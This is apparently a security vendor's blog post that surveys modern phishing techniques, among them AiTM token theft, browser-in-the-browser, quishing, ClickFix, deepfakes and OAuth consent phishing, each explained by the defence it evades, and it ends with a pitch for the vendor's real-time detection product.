The phishing of 2026 looks nothing like the misspelled “Nigerian prince” era. Today’s techniques are precise, automated, and — this is the key insight — each one is engineered to defeat a specific defence you’ve already deployed. Read the list below not as a catalogue of tricks but as a map of how attackers route around every control in a typical security stack.
1. Adversary-in-the-middle (AiTM) — beats MFA
An AiTM kit proxies the real login page. You enter your real password, approve your real MFA prompt, and the attacker silently captures the resulting session token — a valid credential that bypasses MFA, SSO and Conditional Access. [1] Microsoft logged over 10,000 AiTM attacks a month in 2024, and stolen tokens accounted for roughly 31% of Microsoft 365 breaches in 2025. [1][2] One platform, Tycoon 2FA, was behind about 62% of the phishing Microsoft blocked by mid-2025.
2. Browser-in-the-browser (BitB) — beats “check the URL”
BitB draws a fake browser pop-up inside the real page, complete with a convincing title bar, padlock and a legitimate-looking address bar that is really just styled text. [3] It defeats the single most-taught piece of advice — verify the URL — by handing the user a URL that looks perfect.
3. Quishing (QR-code phishing) — beats email link scanners
By putting the malicious link inside a QR code (often embedded in a PDF or image), attackers slip past filters that scan text and URLs, and push the victim onto a personal phone outside corporate defences. Quishing rose roughly 400% between 2023 and 2025, and in one analysis nearly one in four campaigns disguised QR codes or links as MFA prompts. [4]
4. ClickFix / fake CAPTCHA — beats “don’t open attachments”
The fastest-rising technique of the cycle flips the script: instead of delivering malware, it convinces the user to run it themselves. A fake “verify you’re human” or “fix this error” page tells the victim to paste a command into their own computer. It sidesteps attachment scanning entirely — and it works: ClickFix appeared in 47% of Microsoft’s initial-access incident notifications in 2025. [5]
5. AI-generated lures & deepfakes — beats “spot the bad grammar”
Generative AI writes fluent, personalised lures at scale — over 82% of phishing emails now show AI assistance, and AI detectors fail to flag machine-written phishing about three times out of four. [6] It has gone multi-modal, too: voice cloning needs just three seconds of audio, and a deepfake video call impersonating executives convinced a finance worker to wire $25 million in the 2024 Arup case. [7] Video and voice are no longer proof of identity.
6. Vishing & callback phishing — beats email filters entirely
If filters block the email, move to the phone. Voice phishing surged 442% between the first and second halves of 2024, supercharged by AI voice cloning, and smishing and vishing together now account for about 19% of breaches. [7] “Callback” lures send a harmless-looking email urging the victim to phone “support,” where a human (or a cloned voice) walks them into installing access or surrendering a code.
7. OAuth consent & device-code phishing — beats password + MFA
These abuse legitimate sign-in flows. Instead of stealing a password, the attacker tricks the user into granting a malicious app permission or authorising an attacker’s device — gaining standing access with no password and no MFA prompt to trip. [2] Because the flow is genuine, it looks like normal activity.
8. Phishing-as-a-service — the model behind all of it
None of the above requires elite skill anymore. Subscription kits bundle AiTM, evasion, hosting and templates for around $120, with dashboards and Telegram support. [1] Commoditisation is why these techniques spread so fast: the moment one works, it’s packaged and sold to everyone.
The pattern that matters
Line them up and the throughline is obvious: every modern technique is built to defeat a control you already trust. AiTM beats MFA. BitB beats URL-checking. Quishing beats link scanners. ClickFix beats attachment scanning. AI beats the grammar test. Vishing beats email filters. Each one routes around a static, known-pattern defence — a blocklist, a filter, a training rule — by being new, or convincing, or off-channel.
Detection that doesn’t need to have seen it before
Static defences catch yesterday’s attack. SafeToOpen judges the page and the message in real time, on their own behaviour — so a brand-new technique is caught the first time it appears.
Protect your business →The takeaway
The specific techniques will keep changing — whatever tops this list in 2027 hasn’t been packaged yet. What won’t change is the strategy: find the gap in a defence that waits to recognise something it has seen before. The counter is a defence that doesn’t wait — one that analyses what’s actually in front of the user, the instant it loads, regardless of whether it’s ever been seen. That’s the only kind of protection that keeps pace with a threat designed to always be one step new.